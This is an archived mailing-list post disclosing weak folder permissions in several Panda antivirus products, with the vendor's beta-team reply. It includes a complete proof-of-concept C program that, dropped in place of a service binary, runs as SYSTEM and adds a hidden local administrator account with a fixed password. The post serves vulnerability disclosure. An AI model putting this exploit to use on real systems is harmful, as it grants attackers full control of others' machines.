Re: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities



Panda is realy great and realy fast. The Bug was also reported at 16.07.06 to the beta team.




-------------------- 16.07.06 --------------------

Hi there,

i think there are some badly set filesystem permissions in your software.

FileSecure 7.01.10
C:\Programme\Panda Software\AVNT everybody full access

Titanium 2006 (5.03.00)
C:\Programme\Panda Software\ everybody full access

AntiVirus 2007 (2.00.80)
C:\Programme\Panda Software\ everybody full access

Platinum Internet Security 2006 (10.02.00)
C:\Programme\Panda Software\ everybody full access


it is possible to place a binary in the directory and let it execute at startup
as an service with system privs.

example for AntiVirus 2007 (2.00.80):

build it an place it in "C:\Programme\Panda Software\Panda Antivirus 2007"
for english Windows Version Porgram Files or somethin like this.


// --- pavsrv50.c ---
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

system( szCmdLine );

return 0;
}
// --- pavsrv50.c ---


sorry for my bad english :)

testit on german windows xp sp2 all hotfixes and german windows 2k sp4 all hotfixes


btw. check the " if you install services

--------------------------------------------------


BTW: FileSecure 8.00.20 has the same vulnarability

I think the best solution is to change the AV Produkt.


Panda answer:
----------------- 21.07.06 -----------------------
Dear beta-tester,

Thank you very much for joining our beta program and reporting your tests so far.

We comment you that "Panda Antivirus + Firewall 2007" and "Panda Internet Security 2007" have a Shield to protect its processes and files.

All incidents and comments received will help us to build a better product.

Please, do not doubt to report us any other incident or query that you may have.

Best regards,

Beta Area
Quality Assurance Division
mailto:beta@xxxxxxxxxxxxxxxxx

Panda Software
Protection against viruses, spyware, hackers, spam and other Internet threats
Buenos Aires, 12
48001 BILBAO - SPAIN

--------------------------------------------------



Relevant Pages

  • Re: Office 2010 Beta - problem found, where to report?
    ... BTDT and have other methods of reporting bugs. ... But I agree, reporting via the beta forum isn't going to be all that effective, if it has any ... The Send a Frown method is a more uniform reporting method that Microsoft ...
    (microsoft.public.office.misc)
  • Re: Panda Active Scan Pro trial?
    ... thousand Spyware entries (after a clean run from Spybot, Ad-Aware, and ... Don't know about Panda, but... ... that your installed AV was not reporting. ... found by Panda in my Norton Recycle Bin, ...
    (alt.comp.anti-virus)
  • Re: GpsMap276C software 3.93 Beta Available
    ... I never risk these Beta downloads. ... I reported bugs in the program, ... Sending feedback to Garmin seems to be a one way street. ... waste your time e-mailing or Faxing them reporting problems and trying ...
    (rec.boats.electronics)
  • Re: [opensuse] Firefox3 and big icons
    ... I recently tried to update firefox to the new beta (both through smart ... and when using the .tgz). ... all icons are huge (the toolbars are about ... but I couldn't find anyone reporting the same issue on ...
    (SuSE)
  • Re: Warning IE8 RC1
    ... Even in MS TechNet, most are reporting that IE8 is a slug in performance, very disappointing, and having crash problems. ... Most are installing Firefox to avoid IE8. ... Oh, and I couldn't give a rat's a** what any of you want to call it, Beta, RC1, blah, blah, blah, it's STILL in a TESTING stage and mot meant for EVERYONE to use in the wilds as their main browser. ... Just like beta testing for those who refuse to call it a beta LOL. ...
    (microsoft.public.windows.vista.general)